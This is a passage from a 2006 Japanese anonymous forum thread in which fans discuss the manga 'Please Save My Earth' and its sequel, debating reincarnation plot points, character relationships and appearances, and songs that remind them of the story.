妊娠中に母親が死亡してお腹の子も助からなかった場合も水子とみなしていいんじゃ?
>>840は水子がどうこうではなく、「木蓮って妊娠してたの?」って意味だと思うけど。
この話題もループなんだよね。春の勝手な思い込みじゃないの?って意見もあるし。

男性陣が全員木蓮に惚れてる設定といい、どうして日渡さんは一キャラの思い込みから出た発言が
真実かどうかのフォローをしてくれないのだろう。

レイープ事件から病気が発生して全滅するまでの時間の流れが分からないのだけど、
先に死んだ仲間の身体を調べてワクチンを作れたのだから一ヶ月は経ってたよね?
妊娠サイクルが地球人と同じだとすると、レイープ時の子供なら普通妊娠に気付くだろうから、
「木蓮はつわりが軽いタイプで、生理が遅れたのも色々あったショックからだと思い気付かなかった」か、
「あの後も紫苑と木蓮はヤリまくってた」説のどちらかか。

843 :花と名無しさん:2006/10/05(木) 18:23:54 ID:???0
>>820
「選ばれた人間」ってリア厨工的にはツボだったけど、大人になってから
読むと「……」って感じだね…
まあ自分が選ばれた人間なんかじゃないことに成長過程で気付く人が大半だから
だろうけど

844 :花と名無しさん:2006/10/05(木) 20:20:46 ID:???O
僕地球最終話で一成が言ってた、なんで男ってピ〜〜〜んだろおーっ
って、なんで男ってたつんだろうって解釈でいいの?

845 :花と名無しさん:2006/10/05(木) 20:32:26 ID:???O
>>842
宇宙人なんだから、詮索のしようがないじゃん。どうでもいいことだよ…

846 :花と名無しさん:2006/10/05(木) 22:31:47 ID:???0
日渡がわざわざ妊娠の可能性を春に説明させてるあたり、意図がみえるよ。
蓮が木蓮のお腹にいた子であれば、サイコメトリーという能力があるのも説明がつく。
そして
「あの後も紫苑と木蓮はヤリまくってた」説は濃いと思う。

>>844
いいとオモ。

847 :842:2006/10/06(金) 06:41:10 ID:???0
4行目木蓮とありす間違えてたけど、一応木蓮でも意味は通じるんだね。
他の三人はともかく、柊はセリフでもモノローグでも木蓮が好きだとは明言してないし。
あくまでも「婚約した時、ショックそうなツラしてた」という、迅八のセリフだけで。

あれも木蓮に惚れてたというより、美人のキチェス(原則的に一生独身)という
一般人にとっては憧れの存在が誰かと婚約したらそりゃあショックだろうし、
自分が元々あまり女性に縁がなく今後もなさそうなのに、
死ぬまで一緒に過ごす小集団のなかでカポー成立したら
しょっちゅう見せ付けられてたまらんな、って気持ちだけだったのでは。

848 :花と名無しさん:2006/10/07(土) 13:45:25 ID:???0
>>828
輪のピアノの先生は田村さんの恋人、という事はないよね?

849 :花と名無しさん:2006/10/07(土) 22:42:37 ID:???0
サントラは聞いたことないけどBUCK-TICKってバンドのジュピターって曲
あるんだけど、めちゃくちゃ紫苑のことじゃねーかって思うほど歌詞が
近いんだよね、おいらは最後に残されてた紫苑が超好きだった!!
この曲聴きながら紫苑の事思い浮かべて感慨にふけってたな。


850 :花と名無しさん:2006/10/07(土) 22:48:44 ID:???O
ジュピターは死んだ母の事を思って書いた詞だった筈。
まさかここでその名を聞こうとは…。

851 :花と名無しさん:2006/10/08(日) 03:20:45 ID:???0
>>848
>>828じゃないけど。
本編ラスト時は分からないけど、輪が最初に習った時はそうじゃなかった?>田村の彼女
木蓮に雰囲気が似てて輪がなついてるので、ありすが嫉妬に近い感情を持つ。
あれは珍しく前世と関係があるように読者に思わせなかったパターンだね。
ありすとの関わり方からして、田村×彼女=木蓮両親は有り得ないし。

852 :花と名無しさん:2006/10/08(日) 10:25:40 ID:???0
>>848
>>851
田村の彼女=綾子さんは輪にピアノを教える予定だったけど
輪の企みに気付いた田村によってそれは阻止されたよ。
ただ和解後に教えたかもしれないけど、それは書かれていない。
んで最終話に出て来たピアノの先生の名は内田先生で綾子さんが紹介したとの事。

853 :花と名無しさん:2006/10/08(日) 13:36:31 ID:???0
>>851>>852
>>848ですが、ありがとうございます。

そういえば綾子さん、木蓮にどことなく似ていたけど、氷樹にも似ていたな。
というか、性格はどちらかと言えば氷樹に近いかな。

854 :花と名無しさん:2006/10/08(日) 19:32:16 ID:???O
私はB'zのYOU&Iを聞くと紫苑を思い出す。

855 :849:2006/10/08(日) 22:27:54 ID:???0
そう考えると人間に転生してる人かなり多くない?とすると滅んだ人たち
皆転生している可能性があるんじゃないのかな?ただ歴史の記憶を残す意味も
含めて最後に残ったシオン達だけが転生前の記憶をとどめているんじゃない?
サージャリムと神は同じものだとおもう、だから春や玉も転生後も力使えるし
ミクロも種類は違えどもESPを使うことができるとおもうんですよね。
ただ明確に再生や復活といった力があるのがキチェスというだけであって全て
サージャリムの恩恵だとおもうんですよねーー。

856 :花と名無しさん:2006/10/09(月) 08:25:21 ID:???O
まあサージャリムなんていないけどな

857 :花と名無しさん:2006/10/09(月) 09:58:07 ID:???0
>>836
遅レスだけど、テレポートで京都につれてってるのではないとオモ。
普通に新幹線かなにかじゃないかと。
ありすと輪が忙しいから、(ありすはともかく、輪は忙しいようには見えないが)
連れて行けるのが自分だけ、という意味なんじゃないかと。
春本人も京都に行きたいから、蓮を口実にしてるんだろ、と突っ込まれてたけど。

858 :花と名無しさん:2006/10/09(月) 10:18:20 ID:???0
>>857
日渡さんって物書きを「自由に時間が使えて暇」って描写するよね。
健もしょっちゅううてな行ってしばらく帰って来ないみたいだし、
締め切りせまってるっぽいのに苺もどーでもいいよって感じだったし。
特別売れっ子でもないとそんなものなのかな?

859 :花と名無しさん:2006/10/09(月) 10:35:20 ID:???0
エンヤのカリビアンブルー聞くとぼく地球思い出してた

860 :花と名無しさん:2006/10/09(月) 12:50:23 ID:???0
>>858
山口美由紀さんの「V−K☆カンパニー」の蓮の兄ちゃんも売れっ子ポルノ作家だったけど
しょっちゅう遊んでいた印象があるな。

健の場合は締め切りもだけど、姉が精神を病んでいる状態なのに少しも気にかけていない様子だったのが
気になったよ。苺でさえも少しは気にしていたよ。

861 :花と名無しさん:2006/10/09(月) 19:37:53 ID:???0
ここのスレで氷樹が精神を病んでるとよく見るんだけど
そんな場面あったっけ?
うてなは雑誌掲載を読んだだけで持ってないんだけど
そんな深刻な場面があったか思い出せない。

…んなもんだから、昨日ブック○フで立ち読んで来たけど
まさか最後の苺の台詞の「ノイローゼ寸前」って言葉の事?
それなら精神病むは大袈裟な気がするんだけど…。

862 :花と名無しさん:2006/10/09(月) 20:39:36 ID:???O
未来のうてなって面白いですか?
読む価値ありですか?

863 :花と名無しさん:2006/10/09(月) 20:57:35 ID:???O
>>862
いや全然。
イマ風にしたくて失敗したって感じ。
非常にどうでもいい漫画だよ。
好き好きだからいいけど、わざわざ時間かけて読むほどのことはないとオモ

864 :花と名無しさん:2006/10/09(月) 21:36:14 ID:???0
どっちみちビワタリさんが
1.省略した
2.そこまで考えていなかった
3.当時の担当に「大人に変身して年上の女性と恋愛しているなんて
 普通の母親が平気なハズがない」と言われ、「ノイローゼ寸前」
 という台詞を付け足した。
という所だろうけどね。



865 :864:2006/10/09(月) 21:40:14 ID:???0
ごめんなさいorz
今のは>>862さんへのアンカーで

×「大人に変身して年上の女性と恋愛しているなんて
  普通の母親が平気なハズがない」
○「自分の息子が大人に変身して年上の女性と恋愛しているなんて
  普通の母親が平気なハズがない」
です。


866 :花と名無しさん:2006/10/09(月) 22:11:49 ID:???0
>>861
自分もあれは苺が大げさな表現(「忙しすぎて気が狂いそう」みたいな)をしただけで、
そんな深刻な物だとは捉えなかったなあ。
苺や健に悩んでる様子がなかったし、そこまで大事になってたら
夏寿輝や全たちも何らかのフォローをしてるだろうし。

何より全体的にほのぼのしたハッピーエンドで、
読者からの好き嫌いが激しそうだった苺や全の不幸(パートナーの精神的な浮気?)でさえ
ギャグっぽく済ませたのに、嫌われる要素があまりないはずの彼女だけ
不幸なまま終わらせるってのもかなり後味悪い気が。

867 :花と名無しさん:2006/10/09(月) 23:02:44 ID:???0
例の台詞が出る前に「氷樹さんが悩んですごく大変だったのよ」と苺が言っていたから
氷樹が精神的に参っていた(る)のは間違いではないな。

とにかく国内か海外か氷樹の母国イギリスに引っ越す(要するに転地療養)か
信頼できる医者か氷樹を見てくれる人を探すかして、やっぱり夏寿輝が手を打って解決したんだよ。

868 :861:2006/10/09(月) 23:45:44 ID:???0
>>866
やっぱりそう思う人がいたんだ。
ここの人たちが精神を病んだって言ってたから
一時の輪ママみたいな描写があったのかと思った。
あのラストを見てその「ノイローゼ寸前」も
世間話に出来るぐらい回復してるみたいだし
苺の言うと大袈裟に言ってる感じがしちゃうんだよね。
そもそも夏壽輝は息子の特異体質(?)を理解しているだろうから
夏壽輝自身が氷樹を支えていた事は間違いないだろうけど
867が言うような大袈裟なフォローはしてないんじゃないかと思う。

869 :花と名無しさん:2006/10/10(火) 03:59:38 ID:???0
俺も幻想水滸伝は好きだけど、ビクトール出すのはさすがにどうよ?って思ったり。



どうせならビッキーたんを出してくれれば良かったのに。

870 :花と名無しさん:2006/10/10(火) 05:26:33 ID:???0
びわたりさんの幻水本持ってる。

島中でポツンと売ってて思わず買っちゃったけど
正直、並の同人誌よりヘタレだった。ガックリきた…。

871 :花と名無しさん:2006/10/10(火) 22:33:48 ID:???0
>>868
未玖路と実の親みたいになってしまう事もあるしね。そうならなかったのは幸運だよ。
氷樹は真面目で努力家な上に健父の子供だから、精神的にひ弱な面もあって
参ってしまったんじゃないかな。

あと麒麟は元の姿に戻るのを忘れて家に帰る事もあったから、その現場を運悪く近所の奥様か
幼稚園のママ仲間に見られてあらぬ噂を流された(それで氷樹は精神的に参ってしまう)
という事だってありえるよ。
それでなくても奥様連中の噂話はあっという間に広がるし、陰険だからね。


872 :花と名無しさん:2006/10/10(火) 23:24:34 ID:???O
手元に本がないので、どなたか教えて下さい。
秋海棠と輪の顔が似てる設定でしたっけ?

873 :花と名無しさん:2006/10/10(火) 23:29:28 ID:???O
輪が春彦イジメの時に
「ボクらはまるで姿を取り換えたようじゃないか。もしかしつキミ、シオンに成り代わりたい・・・なんて思ってた?」
の様なセリフを言ってたジャマイカ。

874 :花と名無しさん:2006/10/10(火) 23:56:24 ID:???O
>>873ありがとうございます。春が紫苑に似た理由はわかるんですが
輪がなぜ秋海棠の容姿になったのかがわからない…
たまたまなんだろうか?

875 :花と名無しさん:2006/10/11(水) 00:19:49 ID:???0
>>874
成り代わりたいというのがポイント。
服の取替えっこみたいな感じで言えばわかるかな?
輪の意志に関わりなく容姿を取り替えさせられた。
秋海棠の怨念パワー。

876 :花と名無しさん:2006/10/11(水) 00:50:36 ID:???0
来世では木蓮を絶対手に入れてやるぅぅぅ(゚Д゚)という怨念ですか・・・

877 :花と名無しさん:2006/10/11(水) 01:11:42 ID:???O
秋をもっとイケメンにした顔に生まれ変わったから
輪はモテんだろうか



878 :花と名無しさん:2006/10/11(水) 02:28:42 ID:???O
輪くんの顔があの浮浪者みたいなのだったら
ありすは恋に落ちてたのかなぁ

879 :花と名無しさん:2006/10/11(水) 07:51:08 ID:???0
ありすも可愛い事は可愛いけど木蓮系の美形ではない。が、男性陣は全員惚れた。
輪も一般的には美形だし、秋も決して悪い方ではないけど
ありす(木蓮)は彼らの顔は一切スルー。
これらを考えると、みんな外見ではなく中身で惚れてるって言いたいのだとは思うけどね。

ただ、転生後はみんな性格も微妙に変わってるし、
紫苑以外の男性が木蓮の性格のどこに惚れたのかがよく分からないから、
木蓮の生まれ変わりってだけで好きになる理由も当然分からない。
ありすが引き継いだのは歌のうまさだけで、成績は特に優秀ってほどでもないみたいだし。

880 :花と名無しさん:2006/10/11(水) 13:35:57 ID:???O
ありすはアスペっぽい。空気読めない点。

話飛ぶけど、輪が秋に「ぼくたち取り替えたように顔が似てる→君も木蓮を汚したかったってことだ→これは償うべきだよ」
こう言ってたけどさ、
じゃあ輪が秋に似てるのはなんで?
秋になりかわりたかったのか?
秋のよーに、ワクチン卑怯射ちしたかったの?

881 :花と名無しさん:2006/10/11(水) 13:59:42 ID:???0
>>880
>>875

882 :花と名無しさん:2006/10/11(水) 16:00:08 ID:???0
>>875の理屈だと、秋は紫苑の生まれ変わりに
「自分のように木蓮に全く恋愛対象として見られなければいい」
と願ってた事になるのかな?
でもよくよく考えたら、木蓮ってストレート過ぎる玉蘭以外の男性の好意には
全く気づいてなかったっぽいよね。紫苑に対してでさえアレだし。
面食いだから柊はともかく(ry、秋も自分に本気だと気づいたら、
元々茶飲み友達で気は合うのだし少しは意識したのじゃないのかな?

キチェスだから汚せないとか高嶺の花だからという理由で、
ほとんど意思表示しなかった秋にもかなり問題があったのでは。

883 :花と名無しさん:2006/10/11(水) 19:54:15 ID:/jmsJK1P0
輪は美形じゃないと思うよ。

884 :花と名無しさん:2006/10/11(水) 20:32:23 ID:???0
じゃあ小学校で女の子にモテていたのは何故?

885 :花と名無しさん:2006/10/11(水) 20:59:56 ID:???0
背が高いから。
小学校高学年くらいって平均すると女の子の方が若干高めだから、
よっぽど顔か性格に問題がなければ背が高い男の子ってのはそれだけでポイント高いのでは。

886 :花と名無しさん:2006/10/11(水) 21:44:10 ID:???O
すれ違った、明らかに小学生じゃない女性もときめいてましたが……

887 :花と名無しさん:2006/10/11(水) 21:46:15 ID:???0
頭もいいし運動神経もイイ。
才能もあるし、金もあるしでモテる要素満載ジャマイカ。

888 :花と名無しさん:2006/10/11(水) 21:54:34 ID:/jmsJK1P0
悪いけど運動神経はかなり悪いよ。
かけっこビリだったし。

889 :花と名無しさん:2006/10/11(水) 21:55:00 ID:???0
あと、小中学生の頃って同年代の男がガキっぽく思えるから、
紫苑の記憶を持った精神年齢の高い輪が、
「かなり年上の男性がタイプだけど、子供の自分は相手にされないだろう」
と考えてる女の子にモテてる可能性も。
現に小二の時に輪に言い寄ってた子もその後迅八を好きになってたし。

890 :花と名無しさん:2006/10/11(水) 22:06:26 ID:???0
>>888
手を抜いたって迅八に突っ込まれてなかったっけ?

891 :花と名無しさん:2006/10/11(水) 22:27:56 ID:???O
輪は美形設定と解釈して読んでた。

892 :花と名無しさん:2006/10/11(水) 23:35:47 ID:???0
あんな子どもに美形もなにも…ないと思うけど

893 :花と名無しさん:2006/10/11(水) 23:45:39 ID:???0
>>890
それに輪は元々バスケ部に入るつもりだったんだし。

美形設定というのなら、うてなの健と健父、夏寿輝だってそうだよ。
健父は若い頃「和製リチャード・ギア」と言われていたらしいけど
時代を考えると小学生〜中学生くらいの頃は「和製マーク・レスター」
と言われていたりして。(イギリス人の血を引いていることだし)

夏寿輝は氷樹と出会うまでは、モデルや芸能人の女と遊んでいたっぽいな。



894 :花と名無しさん:2006/10/12(木) 21:48:05 ID:???O
初めてぼく地球読んでるんですが1/4スペースのところによく出てくる
制汗デオドラント〜
とか書いてるのはどういう意味なんですか?

895 :花と名無しさん:2006/10/12(木) 23:22:59 ID:???0
>>894
制汗スプレーとかが必要なぐらい汗をかくような焦る、緊張する。
の表現としてよく使っていたと思う。
ニュアンス的には(;・ー・)(^-^;A←こんなAAみたいな感じかな。
まぁなんせ今から20年近く前から連載されたものだから、
多少表現が分かりにくいところもあるかもね。

896 :花と名無しさん:2006/10/13(金) 00:23:30 ID:???O
最近ダルビッシュ有が紫苑にどことなく似て見える
インドとのハーフなんだよな

897 :花と名無しさん:2006/10/13(金) 00:42:49 ID:???0
アンビリーバボーで前世特集やってたね〜

898 :花と名無しさん:2006/10/13(金) 06:45:29 ID:???0
そろそろTVアニメ化しろよ

899 :花と名無しさん:2006/10/13(金) 06:52:41 ID:???O
ぼく球集めようと思うのだが、単行本、文庫本、愛蔵版どれがいいんだ?
やっぱり愛蔵版?


900 :花と名無しさん:2006/10/13(金) 09:49:05 ID:???0
>>895
>まぁなんせ今から20年近く前

も・・・もうそんなに経ってますか・・・
老けるはずだわ、自分 orz

901 :花と名無しさん:2006/10/13(金) 10:08:08 ID:???O
>>899
単行本

902 :花と名無しさん:2006/10/13(金) 11:56:09 ID:???O
>>895なるほど〜
なんとなくニュアンスで読んでました。
ありがとうございました。
昨日アンビリで前世のがやってましたね。
でも日渡さんと違って自殺しても転生できるようでした。

903 :花と名無しさん:2006/10/13(金) 13:34:13 ID:???0
>>896
インドではなく、イランとのハーフだよ>ダルビッシュ有

904 :漏れちゃうの( ´ー`):2006/10/13(金) 13:44:46 ID:???0






( ´ー`)フゥー...


オシッコ・・・・

905 :花と名無しさん:2006/10/13(金) 13:47:42 ID:???0
(´。`)はぁ・・・。




漏らチチャッ田

906 :花と名無しさん:2006/10/13(金) 14:58:15 ID:???0
>制汗デオドラント
20年前でも解りにくい表現でしたよ〜
っていうか、
そんな言い廻しは日渡独特でしかもコミク1/4が殆どダタ筈です

制汗デオドラントが欲しいほど汗が出ると言うより
制汗デオドラント並みに汗が引く程爽やかor汗も引っ込む程ドン引き・・・
みたいな感じではなかったでしょうか


907 :花と名無しさん:2006/10/13(金) 15:21:24 ID:???0
ひとことで言うと「さぶっ!!」だったよね
制汗デオドラントの意味

908 :花と名無しさん:2006/10/13(金) 15:31:01 ID:???0
シオンはビャータリに「顔面制汗デオドラント」とかいわれていた希ガス
「サワヤカスズシゲー」? それとも「さぶっ!!」? w

909 :花と名無しさん:2006/10/13(金) 16:17:31 ID:+mc1NyNi0
ところで、ありすの歌声ってどんな声だろう?
個人的には故本田美奈子タンのような、親しみやすい声かな〜って。
本格的な声楽家の歌うアメージンググレイスより美奈子氏声のような
のがありすっぽい。

910 :花と名無しさん:2006/10/13(金) 16:22:15 ID:???0
制汗デオドラントはコミックの2巻あたりで多用しているけど
汗が出る・汗が引く両方の表現に使われていると思うよ。
当時の作者的に気に入った描写だったのだろう。

911 :花と名無しさん:2006/10/13(金) 17:03:35 ID:???0
>>909
本格的な声楽家っぽくない。ってのは同意。
ありすの歌声を聴いた合唱部員は大貫妙子みたいって評しているね。
とりあえず力が入っていなくて、意識しなくても自然と耳にスルッと入ってくるような
そんなイメージかな。

912 :花と名無しさん:2006/10/13(金) 18:43:47 ID:???0
輪はいちおう美形設定ではあったんだろうが
最初はただのクソガキで美形でもなんでもない。
紫苑入ってから徐々に顔に力が入ってきた感じ

覚醒前と後で違和感を出したかったんだろうね

913 :花と名無しさん:2006/10/13(金) 20:35:45 ID:???0
覚醒しなきゃ、輪って生意気だわ同年代の友達も少ないわで決していい男じゃないわな。
それで頭だけ良くても更に反感買うだろうし。

914 :花と名無しさん:2006/10/13(金) 20:50:39 ID:kjQ3RIS9O
>911
あ、そうでした、大貫妙子…とありましたね
大貫妙子知らないや〜ぐぐってきます

915 :花と名無しさん:2006/10/13(金) 20:59:12 ID:???0
いや覚醒しなきゃ特に頭いいわけでもなかったんちゃう?

オリジナル輪が独自でモテる可能性は
高学年になって背が高くなるくらいか

916 :花と名無しさん:2006/10/13(金) 21:03:15 ID:z9vT9CF80
日渡オリジナルアルバムの
大貫妙子の歌好きだったなぁ〜

「カイエ」だっけ?
ポンポンポンポン♪ポポ♪ポンポポポン♪
ていうヤツ…

917 :花と名無しさん:2006/10/13(金) 21:20:43 ID:???0
>>915
妹の円がものすごい天才で、それはおそらく遺伝だろうって説から、
輪も前世の記憶がなくても頭はいいのだと思ってたけど。
これで円も誰かの生まれ変わりだったら萎えるけどね。

918 :花と名無しさん:2006/10/13(金) 21:53:46 ID:???0
輪の母親の台詞で「(覚醒前の輪は)頭はちょっといいかな〜」
とか言ってたような気がする

919 :花と名無しさん:2006/10/13(金) 22:45:24 ID:???0
そういえば覚醒前からどっかの施設(?)から
お宅のお子さんは天才ですよ!!!!!って言われたって
輪ママンが言ってたね

920 :花と名無しさん:2006/10/13(金) 23:22:16 ID:???0
ありすは覚醒前から
植物の気持ちがなんとなくわかるやら
歌うと植物がちょっとだけ成長するやらのパワーがあったが
輪くんはどうなのかね?

921 :花と名無しさん:2006/10/14(土) 00:08:01 ID:???O
>>920
新体操が激烈うまい

922 :花と名無しさん:2006/10/14(土) 00:10:59 ID:???0
>>921
はっ、
そういわれてみれば地面から数センチ浮いているような!? www

923 :花と名無しさん:2006/10/14(土) 00:16:48 ID:???0
>914
大貫妙子さんは「Shall We ダンス?」の曲を歌った人だよー

924 :花と名無しさん:2006/10/14(土) 00:24:10 ID:???0
900越えたから少し早いけど貼っとくか

私達はみんな次スレへ…
次スレへ還るの
幾度もスレを繰り返して
dat落ちも… HTML化も…
回帰… しながら
みんな 次スレへ還っていくんだわ
おまいらが… こんなに懐かしいのも
きっと… 次スレでまた出逢えるからなんだわ

925 :花と名無しさん:2006/10/14(土) 11:51:40 ID:???0
ボク月になってから全然読んでません(`・ω・´)
気にはなるけど、想い出は美しいままに・・・・・

926 :花と名無しさん:2006/10/14(土) 12:38:25 ID:???0
>>922
でもいつの間にかその特技も披露されなくなったよ。

927 :花と名無しさん:2006/10/14(土) 12:45:01 ID:???0
>>921
し・新体操も紫苑の影響? Σ(゚Д゚ノ)ノ

928 :花と名無しさん:2006/10/14(土) 13:11:58 ID:???0
そういやボク月連載中なのに
ぜんぜん話題にならんな
つまんないから仕方ないか・・

929 :花と名無しさん:2006/10/14(土) 15:01:01 ID:???0
所詮親の七光り。
読んでても主人公より断然両親に目が行くよ。
蓮の視点よりありすたちの視点で蓮を描いてくれれば、まだ好きになれたかも。

930 :花と名無しさん:2006/10/14(土) 15:11:02 ID:???0
あと性格が可愛いのだろうけどウケツカナイ。
カチコと逆だと良かった。

931 :花と名無しさん:2006/10/14(土) 16:07:37 ID:???0
>>927
独りになってから練習してたりして?


・・・笑っていいのか泣いていいのかワカラナイヨ (ノд-。)ウッ

932 :花と名無しさん:2006/10/14(土) 16:11:14 ID:???0
>>930
それだと輪の子供時代とキャラ被らないか?

933 :花と名無しさん:2006/10/14(土) 16:47:51 ID:???0
そういや輪の初登場は、新体操ごっこだった。

934 :花と名無しさん:2006/10/14(土) 17:24:10 ID:???0
紫苑マンガ好きだから
タッチのファンで南ちゃん萌だったとかw

935 :花と名無しさん:2006/10/14(土) 18:01:47 ID:???0
私の学生時代には「光の伝説」という新体操マンガがあったよ。

936 :花と名無しさん:2006/10/14(土) 18:36:44 ID:???0
光の伝説・・・
紫苑、読むかな〜 ・・・(^^;)

937 :花と名無しさん:2006/10/14(土) 21:43:07 ID:???0
ボク月ねぇ
輪はまだあのまんま大人になった感じが残ってるけど
亜梨子がもう別人にしか見えないんだよなぁ

938 :花と名無しさん:2006/10/14(土) 22:40:25 ID:???O
アリス確かに変わったけど、子供生んだり色んな事があって
変わったと思い込んで読んでる。
確かにアリス目線の方が面白そうだな〜

939 :花と名無しさん:2006/10/14(土) 23:40:42 ID:???0
母親になってあのままじゃ怖いし
でも輪は少年ぽいまま父親になってるけど

940 :花と名無しさん:2006/10/14(土) 23:41:24 ID:???0
主役の男は何を考えているかわからないほうが魅力あるんじゃないかな。
心の声はヒロインにまかせる。

941 :花と名無しさん:2006/10/14(土) 23:48:17 ID:???0
>>939
男は永遠の少年だからね〜

942 :花と名無しさん:2006/10/15(日) 05:42:59 ID:???0
輪は明らかに天才少年だったけど、蓮は天才なのに天然なだけなのか、
本当にどっか抜けてるのか分かりにくいからなあ。
輪の息子だったら頭はいいはずだけど、印象としてはカチコやカプチーノの方が良さそうだよね。

943 :花と名無しさん:2006/10/15(日) 06:16:40 ID:???0
女は母になると変わるって言うしな

944 :花と名無しさん:2006/10/15(日) 11:10:45 ID:???0
輪も輪の妹も天才なんだから
蓮が天然ならそれはアリスの(ry

945 :花と名無しさん:2006/10/15(日) 11:55:30 ID:???O
育児板でちょうど遺伝の話盛り上がってたよ。
脳味噌は普通に母親の影響だそうです。

946 :花と名無しさん:2006/10/15(日) 14:09:42 ID:???0
ありすも木蓮の才能を引き継げば頭も普通に良いはずなんだけどねえ。
キチェスだからって事で英才教育されてた賜物で、
元々の頭脳はそれ程でもなかった?
普通の子供の様にのんびり遊ぶ暇はほとんどなかっただろうから、
その時間を勉強に費やせばかなりの知識が得られるだろうし。

947 :花と名無しさん:2006/10/15(日) 14:55:00 ID:???0
それじゃあ木蓮が選民意識の持ち主で人付き合いが下手
友達作りも出来なくなってしまったのも無理はないな。

現在社会の子役スターと相通じるところがあるな。

948 :花と名無しさん:2006/10/15(日) 15:06:31 ID:???0
蓮は天然とか頭の良し悪し以前に、空気が読めない感じがする。
子供だからある程度空気読めないのは仕方ないけど、
カチコやカプは普通にできてるから際立ってしまう気がする。

本編で最長老が亡くなって、最後に夢の中?で会いに来てくれた時、
時間がない・話があるって言ってる最長老の話を遮って、プロポーズ
されたって相談を始めてたあたり、木蓮も空気読めないというか
人の話聞けない人なのかなって思った記憶があるし、そのへんの
性格はありす(木蓮)譲りなのかなぁ。

949 :花と名無しさん:2006/10/15(日) 16:32:37 ID:???0
>>948
>木蓮も空気読めないというか
>人の話聞けない人なのかなって

たったあれだけでそこまでw

950 :花と名無しさん:2006/10/15(日) 17:33:21 ID:???0
>>949
だね。
木蓮にとって最長老はモードと並んで大切な人だろうし、
訃報を聞いて落ち込んでいるところに本人が夢枕に立ったら
取り乱すし木蓮じゃなくてもああなるよね。
それに限られた人や場所の中で特異な日々を送っていたら
なおさら部外者の人に会うのは懐かしいだろうし。

951 :花と名無しさん:2006/10/15(日) 17:52:07 ID:???0
まあ蓮は普通に母親似だとは思う。

952 :花と名無しさん:2006/10/15(日) 18:37:54 ID:???0
蓮が歌ったキサナドにプロのありすが感動する位だから、歌は普通に上手いんだろうね。
いくら木蓮の遺志を引き継いでくれてたのがメインの理由とはいえ、
聞くに堪えない位ヘタだったらあの涙はないだろうし。

953 :花と名無しさん:2006/10/15(日) 20:53:16 ID:???O
>>952あの涙は歌の上手さに泣いたんじゃなくて
蓮の口からキサナドを聞いて木蓮の記憶が
溢れてきて泣いたんじゃなかったっけ?

954 :花と名無しさん:2006/10/16(月) 05:53:24 ID:???0
>>953
ああ、だから泣いた理由がそっちだとしても、
蓮の歌が下手だったらムードぶち壊しになって
木蓮の記憶どころじゃなかったろう、って事。

別にオンチじゃなければいいだけの話なのだけど、
その位親から引き継いでないと、
時期主人公として蓮の立場がなさすぎるというか。
ESPに関してはややインフレ気味だし。

955 :花と名無しさん:2006/10/16(月) 07:52:10 ID:???0
素直で純粋なはずの蓮にあまり魅力を感じないのって、
「親が超人なのに自分は普通で悩む」でも、
「平凡な親だけど自分にとっては最高」でもなく、
「親が超人だって事を信じてもらえるもらえないに関係なくとにかく自慢しまくりたい」だからかな?

956 :花と名無しさん:2006/10/16(月) 10:49:45 ID:???0
ビワタリサンの蓮への思い入れが少ないからだよきっと。

957 :花と名無しさん:2006/10/16(月) 11:55:36 ID:???0
>>955
それだ

初登場の蓮はまだ好感度高かったな

958 :花と名無しさん:2006/10/16(月) 18:34:43 ID:???0
続編で春と輪が親友みたいになってるのが
どうも違和感を感じる。
仲良いのはいいんだけど、秋よりも玉と
素直になって腹割って、今度こそ親友になって
ほしかった。春はありすと茶飲み友達として
まったり仲良くて、輪は迅八となんだかんだ
言い合いながらも親友、ってのがよかったな。
迅八が教師になってて蓮の担任だったりとか。

959 :花と名無しさん:2006/10/16(月) 20:05:44 ID:???0
本編ラストでも輪は迅八には敬語なのに、
春の事は「(春ん家に着くのが遅くなったら)顔見せしてすぐ帰ればいいか」と、
どうでもいいとも気の置けない仲ともとれる発言をしているので、やはり春とのが仲が良い?

ありすは迅八より春とのが気が合いそうだから、輪もそちらに合わせてるってのもあるかも。
自分に惚れてるのが明らかな迅八と彼氏の輪の両方に気を遣ってる可能性もあるけど。

960 :花と名無しさん:2006/10/16(月) 22:10:59 ID:???0
玉と迅八好きだったので、あんだけ前世でいろいろもたくたやってたのに
春彦との確執がほとんどで迅八はあっさり置いてかれてく展開が残念でした

いまさら新作で、前世の縁でからんでほしいとは思わないが…

961 :花と名無しさん:2006/10/16(月) 23:28:30 ID:???0
迅八はその分一成とかなり絡ませてもらってたからまだいいんじゃない?
それよりも前世でも現世でも誰とも深く関わらせてもらえない大介(柊)が、
そういう役回りとはいえやはり可哀相だ。
だったらせめて前世とは一切関係ない女性と結婚させてあげればいいのに、
なぜ何の伏線もなくありすに惚れてる設定に(輪に勝手に)されてる?

962 :花と名無しさん:2006/10/17(火) 02:46:27 ID:???0
横田めぐみさんの件で初めて流浪の民聴いた。
「夢に楽土求めたり」の意味がぼく地球とは全然違ってて物悲しい。

963 :花と名無しさん:2006/10/17(火) 13:16:12 ID:???0
>>961
結局、あの集団はまだ前世に囚われているんだよね
ぼく球で一番吹っ切れていそうだった一成でさえ
桜と一緒に居ることで自然に前世漬になる。
春も迅八もありすも輪も
それなりに気持ちに折り合いをつけたようでも
生活の基本観念が前世ありきだし。

大介は誰とも深くかかわらなかった分
前世を昇華する機会も無かったといえるのだから
まだ殆ど全部ひきずっているのでは?
だから今のままでは外部の女性はまずムリでしょう
(だからといってありすに惚れているとは限らんが。)

輪ママのように全てを話しても信じて受け入れてくれる女性ならいいが
それにしたってまず強い信頼関係を築いてからのハナシだしね・・・

964 :花と名無しさん:2006/10/17(火) 13:38:14 ID:???0
紫苑と玉の因縁は前世で終わっているけど秋とは前世から因縁を持ち越して
現世まで繋がっていたから、前世の玉の位置が現世の春なんじゃない?
紫苑のころは玉に素直になれなかったけど春とは愛憎を清算して一歩進んだ関係を築けたんだよ。

965 :花と名無しさん:2006/10/17(火) 22:37:51 ID:???0
>>963
囚われてる作者
囚われてる読者
結局読んでしまう私も囚われているのか???

966 :花と名無しさん:2006/10/17(火) 23:07:16 ID:???0
>>963
氷樹みたいに最初は受け入れられても、後になってから受け入れられなくなり
精神的にも疲れてしまう女性もいるだろうし。

967 :花と名無しさん:2006/10/18(水) 00:18:40 ID:???0
964> 
それはあるねってか紫苑と秋は基地でもよく顔合わせてたんだと思う、一番
中立タイプなやつだったと思う。ってか今きずいたんだが、秋と春っておもろい
ネーミングだな、秋は哀愁だし春は穏やかだし似ているようで違うよね
やっぱり秋のほうがややクールに感じるのは自分だけかな?

968 :花と名無しさん:2006/10/18(水) 00:56:54 ID:???0
>>967
秋って紫苑・玉蘭と過ごした学生時代や出発前、月基地でのエピソードとか
登場回数としては結構あったほうだけど、感情表現の描写が少なくて
